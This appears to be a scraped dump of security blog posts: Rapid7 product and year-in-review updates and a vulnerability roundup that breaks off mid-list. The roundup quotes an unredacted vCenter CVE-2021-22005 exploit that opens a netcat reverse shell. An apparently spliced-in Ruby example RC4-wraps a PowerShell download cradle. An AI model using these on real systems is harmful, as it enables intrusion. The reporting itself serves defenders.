repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
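Before the download links, an added example of the RC4 wrapping that #11257 above adds for PowerShell. It is written for this page in Ruby, the framework's language, and is not the framework's own code; the PowerShell one-liner is constructed and `example.invalid` is a placeholder host. It shows what "obfuscation" buys and what it does not: RC4 is a broken cipher, and the key must ship inside the stager so the script can decrypt itself, so the only thing defeated is string matching on the wire or on disk.

```ruby
# Added example for this page, not the framework's code from #11257: an RC4
# keystream and a wrap/unwrap pair showing what "obfuscation" buys. RC4 is
# a broken cipher, and the key has to ship inside the stager so the script
# can decrypt itself, so this defeats string matching on the wire or on
# disk and nothing more.

# Constructed sample: the kind of download cradle a stager carries. The host
# is a placeholder, not a real server.
SAMPLE_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"

# RC4: key scheduling (KSA) then the keystream generator (PRGA) XORed over
# the data. Encryption and decryption are the same operation.
def rc4(key, data)
  k = key.bytes
  raise ArgumentError, 'RC4 key must not be empty' if k.empty?

  s = (0..255).to_a
  j = 0
  256.times do |i|
    j = (j + s[i] + k[i % k.size]) & 0xff
    s[i], s[j] = s[j], s[i]
  end

  i = j = 0
  data.bytes.map do |byte|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) & 0xff]
  end.pack('C*')
end

# Wrap: RC4 the script and base64 it (single line) for embedding in a stager.
def wrap_powershell(script, key)
  [rc4(key, script)].pack('m0')
end

# Unwrap: what the stager does at run time before handing the clear text to
# Invoke-Expression, and what an analyst does once they have pulled the key
# out of the same stager.
def unwrap_powershell(blob, key)
  rc4(key, blob.unpack1('m0')).force_encoding('UTF-8')
end

if $PROGRAM_NAME == __FILE__
  blob = wrap_powershell(SAMPLE_PS, 'demo-key')
  puts "wrapped:   #{blob}"
  puts "contains DownloadString? #{blob.include?('DownloadString')}"
  puts "unwrapped: #{unwrap_powershell(blob, 'demo-key')}"
end
```

On the defensive side, note where this wrapping stops helping the attacker: the decrypted text is handed to Invoke-Expression on the target, so AMSI and script block logging see the clear script at that point regardless of how it travelled, and the key sitting next to the blob means any captured stager can be unwrapped offline with the same function.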
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-30T17:42:19", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"], "modified": "2021-04-30T17:42:19", "id": "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "href": "https://blog.rapid7.com/2021/04/30/metasploit-wrap-up-109/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. 
Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the **Export to PDF** button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. 
This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. 
More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. 
Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:04:19", "description": "\n\nNow that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. 
We worked harder than ever last year to help protectors keep their organization's infrastructure secure \u2014 even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.\n\n## Emergent threats and vulnerability disclosures\n\nAs always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let's revisit some of the highlights.\n\n### Emergent threat reports\n\n * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)\n * [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\n * [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n * [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)\n\n### Vulnerability disclosures\n\n * [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities 
(FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)\n * [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * [CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)\n\n## Research and policy highlights\n\nThat's not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.\n\n * We published several reports on the state of cybersecurity, including:\n * Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)\n * Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)\n * Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)\n * We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. 
(Spoiler: It is.)\n * We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).\n * We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.\n * We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.\n\n## The Rapid7 family keeps growing\n\nThroughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.\n\n * [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.\n * [We teamed up with open-source platform Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.\n * [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.\n\n## Industry accolades\n\nWe're always thrilled to get industry recognition for the work we do helping protectors secure their organizations \u2014 and we had a few big nods to celebrate in 2021.\n\n * Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).\n * We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for 
MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).\n * InsightIDR was recognized by Gartner as a [Leader in SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.\n * For its 2021 Dynamic Application Security Testing (DAST) Magic Quadrant, Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).\n\n## Keeping in touch\n\nClearly, we had a pretty busy 2021 \u2014 and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.\n\n * Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. 
Season 5 launches later this month!\n * Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).\n * Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).\n * Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).\n\nStay tuned for more great content, research, and much more in 2022!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-05T18:52:41", "type": "rapid7blog", "title": "Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2021-1675", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-34527", "CVE-2021-3546", "CVE-2021-36934", "CVE-2021-44228"], 
"modified": "2022-01-05T18:52:41", "id": "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "href": "https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-28T15:43:01", "description": "\n\nAnother quarter comes to a close! While we definitely had our share of summer fun, our team continued to invest in the product, releasing features and updates like recurring coverage for enterprise technologies, performance enhancements, and more. Let\u2019s take a look at some of the key releases in [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) from Q3. \n\n## [[InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>) and [Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>)] Recurring coverage for VMware vCenter\n\nRecurring coverage provides ongoing, automatic vulnerability coverage for popular enterprise technology and systems. We recently added VMware vCenter to our list.\n\nVMware vCenter Server is a centralized management platform used to manage virtual machines, ESXi hosts, and dependent components from a single host. Last year, vCenter was a significant target for bad actors and became the subject of a [number](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>) [of](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>) zero-days. Rapid7 provided ad hoc coverage to protect you against the vulnerabilities. 
Now, recurring coverage ensures fast, comprehensive protection that provides offensive and defensive security against vCenter vulnerabilities as they arise.\n\n## [InsightVM and Nexpose] Tune Assistant\n\nThe Security Console in InsightVM and Nexpose contains components that benefit from performance tuning. Tune Assistant is a built-in feature that will calculate performance tuning values based on resources allocated to the Security Console server, then automatically apply those values.\n\nTuning is calculated and applied to all new consoles when the product first starts up, and customers experiencing performance issues on existing consoles can now easily increase their own resources. For more information, read our [docs page](<https://docs.rapid7.com/insightvm/configuring-maximum-performance-in-an-enterprise-environment/>) on configuring maximum performance in an enterprise environment.\n\n\n\n## [InsightVM and Nexpose] Windows Server 2022 Support\n\nWe want to ensure InsightVM and Nexpose are supported on business-critical technologies and operating systems. We added Windows Server 2022, the latest operating system for servers from Microsoft, to our list. The Scan Engine and Security Console can be installed and will be supported by Rapid7 on Windows Server 2022. [Learn more](<https://www.rapid7.com/products/insightvm/system-requirements/>) about the systems we support. 
\n\n## [InsightVM and Nexpose] Checks for notable vulnerabilities\n\nWith exploitation of major vulnerabilities in [Mitel MiVoice Connect](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>), multiple [Confluence](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) [applications](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>), and [other](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) [popular](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>) [solutions](<https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/>), the threat actors definitely did not take it easy this summer. InsightVM and Nexpose customers can assess their exposure to many of these CVEs for vulnerability checks, including:\n\n * **Mitel MiVoice Connect Service Appliance | CVE-2022-29499:** An onsite VoIP business phone system, MiVoice Connect had a data validation vulnerability, which arose from insufficient data validation for a diagnostic script. The vulnerability potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>).\n * **\u201cQuestions\u201d add-on for Confluence Application | CVE-2022-26138:** This vulnerability affected \u201cQuestions,\u201d an add-on for the Confluence application. It was quickly exploited in the wild once the hardcoded password was released on social media. 
[Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).\n * **Multiple vulnerabilities in Zimbra Collaboration Suite:** Zimbra, a business productivity suite, was affected by five different vulnerabilities, one of which was unpatched, and four of which were being actively and widely exploited in the wild by well-organized threat actors. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>).\n * **CVE-2022-30333**\n * **CVE-2022-27924**\n * **CVE-2022-27925**\n * **CVE-2022-37042**\n * **CVE-2022-37393**\n\nWe were hard at work this summer making improvements and increasing the level of protections against attackers for our customers. As we head into the fall and the fourth quarter of the year, you can bet we will continue to make InsightVM the best and most comprehensive risk management platform available. 
Stay tuned for more great things, and have a happy autumn.\n\n_**Additional reading:**_\n\n * _[The 2022 SANS Top New Attacks and Threats Report Is In, and It's Required Reading](<https://www.rapid7.com/blog/post/2022/09/14/the-2022-sans-top-new-attacks-and-threats-report-is-in-and-its-required-reading/>)_\n * _[InsightVM: Best Practices to Improve Your Console](<https://www.rapid7.com/blog/post/2022/09/12/insightvm-best-practices-to-improve-your-console/>)_\n * _[5 Steps for Dealing With Unknown Environments in InsightVM](<https://www.rapid7.com/blog/post/2022/09/06/5-steps-for-dealing-with-unknown-environments-in-insightvm/>)_\n * _[What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-28T14:11:35", "type": "rapid7blog", "title": "What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005", "CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-36804", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-09-28T14:11:35", "id": "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "href": "https://blog.rapid7.com/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let's start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected there, but it didn't get there.\n\n## Autodiscover leak discovered by Guardicore Labs \n\n"Autodiscover, a protocol used by Microsoft Exchange for automatic configuration of clients such as Microsoft Outlook, has a design flaw that causes the protocol to \u201cleak\u201d web requests to Autodiscover domains outside of the user\u2019s domain but in the same TLD (i.e. Autodiscover.com)." [Guardicore Labs acquired multiple Autodiscover domains](<https://www.guardicore.com/labs/autodiscovering-the-great-leak/>) and have captured 372,072 Windows domain credentials in total. It seems Microsoft have chosen to ignore this issue. No CVE, no Outlook or ActiveSync patches. The only fix is to ban the "Autodiscover." domains on devices.\n\n## Microsoft Patch Tuesday for October 2021\n\n74 vulnerabilities: 1 Critical, 30 High, 43 Medium.\n\n### Elevation of Privilege - Windows Kernel (CVE-2021-40449)\n\nIt is a [use-after-free vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/>) in the NtGdiResetDC function of the Win32k driver. 
A detailed technical description is available in the Kaspersky [Securelist post](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>), but, in short, the vulnerability can lead to leakage of kernel module addresses in the computer\u2019s memory. This vulnerability is being exploited in the wild by APT MysterySnail. All servers and desktops should be updated.\n\n### Remote Code Execution - Microsoft Exchange Server (CVE-2021-26427)\n\nIt is necessary to update the Exchange servers, but it's not very critical. "Despite the high CVSS score, the advisory does specifically point out that the vulnerability would only be exploitable from an adjacent network". There are no signs of exploitation or exploits yet. Three other vulnerabilities related to Exchange Server were also patched: CVE-2021-41350, a Spoofing vulnerability; CVE-2021-41348, allowing elevation of privilege; and CVE-2021-34453, which is a Denial of Service vulnerability.\n\n### Remote Code Execution - Windows DNS Server (CVE-2021-40469)\n\nDNS servers need to be updated, but real exploitation is unlikely. It was categorized as \u201cExploitation Less Likely.\u201d It received a CVSSv3 score of 7.2 because an attacker needs a privileged user account in order to exploit this across the network.\n\n### Remote Code Execution - Microsoft Word (CVE-2021-40486)\n\nThis is a good reason to check the Windows desktop updates. "This patch corrects a bug that would allow code execution when a specially crafted Word document is viewed on an affected system. Although Microsoft lists user interaction required, the Preview Pane is also listed as an attack vector." 
Also take a look at desktop vulnerability Spoofing - Windows Print Spooler (CVE-2021-36970), \u201cExploitation More Likely\u201d.\n\nAnd here you can get the whole [Vulristics report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_october2021_report_avleonov_comments.html>) for Microsoft Patch Tuesday October 2021.\n\n## Apache RCE with exploit (CVE-2021-41773)\n\nApache situation is like The Benny Hill Show. First, they released a new version (49) with a critical Path Traversal / RCE vulnerability CVE-2021-41773. Other versions were safe. Fortunately, this was revealed relatively quickly, in 2 weeks. The main stable distributions simply did not have time to add these packages to their repositories. Only fans of installing Apache from source and users of Slackware, Fedora and FreeBSD have suffered. And what was left for the victims to do? Obviously, hurry to roll the new safe version (50). But it turned out that the vulnerability in 50 was not completely fixed. And now the exploit [Apache HTTP Server 2.4.50 - Path / Traversal & Remote Code Execution (RCE)](<https://vulners.com/exploitdb/EDB-ID:50406>) is [publicly available](<https://t.me/avleonovnews/7619>). Repeat the exercise comrades in rolling now version 51. Everything will definitely be fine there.  It's just a circus. \n\n## HAProxy RCE with exploit (CVE-2021-40346)\n\nA critical security vulnerability has [been disclosed in HAProxy](<https://thehackernews.com/2021/09/haproxy-found-vulnerable-to-critical.html>), a widely used open-source load balancer and proxy server, that could be abused by an adversary to possibly smuggle HTTP requests, resulting in unauthorized access to sensitive data and execution of arbitrary commands, effectively opening the door to an array of attacks. 
[A public POC](<https://github.com/donky16/CVE-2021-40346-POC>) has appeared for the vulnerability.\n\n## VMware vCenter arbitrary file upload with public exploit\n\n"[On September 21, 2021, VMware disclosed](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server. On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability".\n\n> CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. \n \ncurl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" <https://t.co/wi08brjl3r> [pic.twitter.com/bwjMA21ifA](<https://t.co/bwjMA21ifA>)\n> \n> -- wvu (@wvuuuuuuuuuuuuu) [September 27, 2021](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020?ref_src=twsrc%5Etfw>)\n\n## RCE exploits for Moodle\n\nSeveral RCE exploits for Moodle [were released on October 13](<https://t.me/avleonovnews/7605>). \n\n 1. [1337DAY-ID-36891](<https://vulners.com/zdt/1337DAY-ID-36891>) - Moodle Admin Shell Upload Exploit\n 2. [1337DAY-ID-36892](<https://vulners.com/zdt/1337DAY-ID-36892>) - Moodle SpellChecker Path Authenticated Remote Command Execution Exploit\n 3. 